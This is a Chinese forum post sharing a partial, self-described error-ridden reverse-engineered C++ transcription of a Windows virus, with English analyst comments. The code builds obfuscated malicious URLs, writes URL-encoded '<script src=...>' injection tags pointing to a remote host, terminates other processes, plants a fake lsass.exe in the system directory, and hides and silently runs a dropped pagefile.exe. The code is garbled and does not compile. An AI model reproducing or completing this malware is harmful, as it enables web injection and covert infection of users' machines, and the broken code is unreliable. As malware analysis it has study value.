1."一部分"是指用处不大的一部分(大家可以具体看代码).
2.代码里边有不少错误和缺失,大家只可当作娱乐.
3.放出来只是为了娱乐或者虚荣,不是为了技术,因为这里边没有什么技术.
4.不要用于非法用途.
代码如下:
代码:
//complaint for NewNote1.
// Reverse-engineering transcription of a dialog-based (MFC CDialog) sample.
// The "[esi+...]" and "ebp-..." notes are object-member / stack offsets the
// analyst recorded from the disassembly. As transcribed the text does not
// compile: e.g. the "DOWRD" typo in the class, no ';' after the class body, and
// the per-character Format() calls in OnInitDialog use a two-character
// literal '//'. Nothing below is corrected; only comments were added.
// Analyst note: every URL and window-title string is assembled at runtime from
// single characters or short fragments (see OnInitDialog), so a static string
// scan of the binary does not reveal them - they exist only in memory.

char OrgPath[256];//seems 6d0?
// Filled from *__p__agrv() in OnInitDialog, i.e. the path the process was
// started with (used later as the base of strOrgPath).
char aHttp[]="http:////";           // scheme prefix prepended to each runtime-built URL fragment
char aMsctfime[]="MSCTFIME ";       // aMsctfime+aSmss form strWindowName, the title passed to FindWindow("XOR", ...)
char aSmss[]="SMSS";
char aMci[]="MCI";                  // aMci+aProgram+aCom+aApplication form the title searched with FindWindowEx(0,0,"#32770", ...)
char aProgram[]=" Program";
char aCom[]=" Com";
char aApplication[]=" Application";//? maybe now array just constant.
char* pNull=NULL;//40e110
// Only visible use: assigned to m_strTemp2 in OnInitDialog.
CString strWindowName;//?char buffer
// Reused for three unrelated values in OnInitDialog: the FindWindow title, a
// URL-encoded script source, and finally the text given to SetWindowText().
CString strWebSite1;                // first runtime-built URL (only written in the visible code)
CString strWebSite2;                // second runtime-built URL; also copied into m_strWebSite2
CString strNewLsaPath;              // "<system dir>\com", then immediately overwritten by "%s%s" of strNewFilePath and m_strLsass
char aNewLsaPath[255];              // strcpy() copy of strNewLsaPath
// NOTE(review): strNewFilePath is not declared anywhere in this listing -
// presumably a transcription slip for strNewLsaPath; verify against the binary.

// Dialog class of the sample. Members are listed with the object offsets the
// analyst recovered; nearly all are CString holders that OnInitDialog fills.
class CVirDlg:public CDialog
{
public:
    CString m_strWebSite2;//[esi+A8C]   copy of strWebSite2
    CString m_strWebSite3;//[esi+A98]   third runtime-built URL
    CString m_strTemp1;//[esi+A74]      set to NULL in OnInitDialog
    CString m_strScript1;//[esi+A59]    "<script src=...>" tag wrapped around a URL-encoded host string
    CString m_strScript11;//[esi+A5D]   mixed-case, single-quoted variant of the same tag
    CString m_strExe;//[esi+A49]        "~.exe"
    CString m_strLsass;//[esi+A4D]      "lsass.exe" - a system-process name used as the file name in strNewLsaPath
    CString m_strSmss;//[esi+A51]       "smss.exe"
    CString m_strTemp2;//[esi+A2C]      set from pNull
    DWORD m_dwTemp;//[esi+60]           zeroed in OnInitDialog
    char m_ModuleName[0x68];//[esi+68]
    // NOTE(review): GetModuleFileName() is later called on this 0x68-byte array
    // with size 0x9c4 and with &m_ModuleName (a char(*)[0x68]); one of the two
    // sizes is a transcription error - as written the call would overflow.
    DOWRD m_dwTemp1;//[esi+A30]         sic: typo for DWORD in the transcription; zeroed in OnInitDialog
    CString m_strCmdLine;//[esi+A45]    GetCommandLine(), lower-cased
}

// OnInitDialog continues beyond this line; the remainder of its body was not
// reviewed here.
BOOL CVirDlg::OnInitDialog()
{
SetPriorityClass(GetCurrentProcess(),IDLE_PRIORITY_CLASS);
CoInitialize(NULL);
CString strTemp;
char aEspPifName[256];//ebp-9dc
srand((unsigned)time(NULL));
CDialog::OnInitDialog();//here invoke the baseclass member function.
SendMessage(m_hWnd,WM_SETICON,ICON_BIG,m_hIcon);//SetIcon(m_hIcon,TRUE)
SendMessage(m_hWnd,WM_SETICON,ICON_SMALL,m_hIcon);//SetIcon(m_hIcon,FALSE) .m_hIcon is a handle of CVirDlg.
strcpy(OrgPath,*__p__agrv()); strTemp.Format("%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c",'w','.','c','0','m','o','.','c','o','m','//','r','.','h','t','m'); strTemp=aHttp+strTemp; strWebSite1=strTemp; strTemp.Format("%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c",'j','s','.','k','0','1','0','2','.','c','o','m','//','a'\ 'd','.','a','s','p','.','h','t','m'); strTemp=aHttp+strTemp; strWebSite2=strTemp; m_strWebSite2=strTemp; strTemp.Format("%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c",'j','s','.','k','0','1','0','2','.','c','o','m','/','g','o',\ '.','a','s','p','.','a','d','.','a','s','p'); strTemp=aHttp+strTemp; m_strWebSite3=strTemp; strWindowName=aMsctfime; strWindowName+=aSmss; m_strTemp1=NULL; strTemp=aMci; strTemp+=aProgram; strTemp+=aCom; strTemp+=aApplication; if(CWnd::FromHandle(FindWindow("XOR",strWindowName))) { DWORD dwPid1=0; GetWindowThreadProcessId(FindWindowEx(0,0,"XOR",strWindowName),&dwPid1); DWORD dwPid2=0; GetWindowThreadProcessId(FindWindowEx(0,0,"#32770",strTemp),&dwPid2); int dwTimes=0; do { if(FindWindow("XOR",strWindowName)) { HANDLE hVirProc; if(hVirProc=OpenProcess(PROCESS_ALL_ACCESS,0,dwPid1) Terminate(hVirProc); else CloseHandle(hVirProc); if(hVirProc=OpenProcess(PROCESS_ALL_ACCESS,0,dwPid2) Terminate(hVirProc); else CloseHandle(hVirProc); } }while(++dwTimes!=5) //?why terminate the vir proc strWindowName="http:\/\/%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D\/%30%31%2E%61%73%70"; strTemp="<script src=\\""+strWindowName+"\"><\/script>"; m_strScript1=strTemp; strTemp="<ScRiPt src=\'"+strWindowName+"\'><\/sCrIpT>"; m_strScript11=strTemp; strTemp.Format("%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c",'M','C','I',' ','P','r',\ 'o','g','r','a','m',' ','C','o','m',' ','A','p','p','l','i','c','a','t','i','o','n'); strWindowName=strTemp;//40d924. 
strTemp.Format("%c%c%c%c",'~','.','e','x','e'); m_strExe=strTemp; strTemp.Format("%c%c%c%c%c%c%c%c%c",'l','s','a','s','s','.','e','x','e'); m_strLsass=strTemp; strTemp.Format("%c%c%c%c%c%c%c%",'s','m','s','s','.','e','x','e'); m_strSmss=strTemp; SetWindowText(strWindowName); m_strTemp2=pNull; m_dwTemp=0; m_dwTemp1=0; GetModuleFileName(NULL,&m_ModuleName,0x9c4);//ModuleName is the full path name. _stat stInfo; _stat(&m_ModuleName,&stInfo);//get module startup information. char aSysDir[255]; GetSystemDirectory(aSysDir,255); strNewLsaPath.Format("%s\\com",aSysDir); strNewLsaPath.Format("%s%s",strNewFilePath,m_strLsass); strcpy(aNewLsaPath,strNewLsaPath); CString strOrgPath=OrgPath; strOrgPath.MakeLower(); m_strCmdLine=GetCommandLine();//include "" semilicon. m_strCmdLine.MakeLower(); if((int nPos=m_strCmdLine.Find("\""))!=-1) { m_strCmdLine+=" "; m_strCmdLine=m_strCmdLine.Mid(m_strCmdLine.Find("\"",++nPos)+1);//blank space? CString strMutex=strOrgPath+m_strCmdLine;//add one blank space. strMutex.Replace("\\"," "); strMutex.Replace(":"," "); strMutex.Replace("."," "); HANDLE hMutex=CreateMutex(NULL,TURE,strMutex); if(GetLastError()=ERROR_ALREADY_EXIST) exit(0); int nTimes=0; if(_mbscmp(" ^",m_strCmdLine.Left(2))!=-1) //code page.a lot of other things. { SetFileAttributes(m_strCmdLine.Mid(2),HIDDEN|SYSTEM);//? do { if(DeleteFile(m_strCmdLine.Mid(2))!=-1) Sleep(60); else eixt(0); }while(++nTimes<30); exit(0); } if(strOrgPath.Find("pagefile.pif")!=-1) //strOrgPath ebp-2c { CString strRootFile=strOrgPath.Left(3); strRootFile=strRootFile+"pagefile.exe";//strRootFile ebp-20 ThrowVirus(strRootFile,0xc1,"sexp");//throw out the new virus file. SetFileAttributes(strRootFile,HIDDEN|SYSTEM); WinExec(strRootFile,SW_HIDE);//pagefile.exe---invoke the COM component. fun(strRootFile);